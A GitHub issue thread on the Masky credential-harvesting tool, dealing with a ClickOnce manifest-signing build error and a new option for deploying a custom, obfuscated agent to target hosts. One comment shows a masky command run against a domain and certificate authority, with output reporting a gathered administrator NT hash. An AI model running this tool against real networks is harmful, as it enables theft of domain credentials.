### ISSUE TITLE
Masky Agent - Sign Manifest when compiling 

### ISSUE THREAD

**Issue by ChoiSG** [Z4kSec/Masky#3]
## Problem 
Currently, the Masky agent solution contains ClickOnce or some kind of certificate signing. When you clone the repo and try to compile the agent, the following error comes up: 

```
Unable to find manifest signing certificate in the certificate store.
```

## Solution 
This can be fixed with 
1. Project Properties -> Signing -> Tick off `Sign the ClickOnce manifests`  or, by 
2. Changing the .csproj file with 
```
<PropertyGroup>
  <SignManifests>false</SignManifests>
</PropertyGroup>
```

--- 

I wasn't sure if this was intended or not. Also, if I were to make a PR to the agent code, is it okay for me to disable the ClickOnce manifest and then make the PR?

**Comment by Z4kSec** [comment]
Hi @ChoiSG !

Thanks a lot for your issue. I cleaned up the _Masky.csproj_ file to remove the manifest related parts, including the signature.

I also added a new option ("_-e_" or "_--exe_") that now to provides a path pointing to the Masky executable agent that needs to be deployed on the targeted hosts.

This will allow to recompile the agent or to pack it and to easily use it.

Could you please check if the changes pushed on the "**v.0.1.2**" branch address your issue?

**Comment by ChoiSG** [comment]
@Z4kSec  Thank you for the help! The compilation worked right away (except changing debug -> release due to dnmerge, but that's w/e), and the `-e` flag also worked smoothly with the obfuscated Masky agent. 

```
└─# masky -d choi.local -u da -p 'REDACTED' -ca dc01.choi.local\\choi-DC01-CA 192.168.40.150 -e invismoosky.exe
    
[ .... ] 
[+] (192.168.40.150) Gathered NT hash for the user 'choi.local\administrator': REDACTED
[*] Exiting...
```

Think we can close this issue. Ty for the help!

**Comment by Z4kSec** [comment]
Thank you ! v0.1.2 merged to master :)

I close the issue.
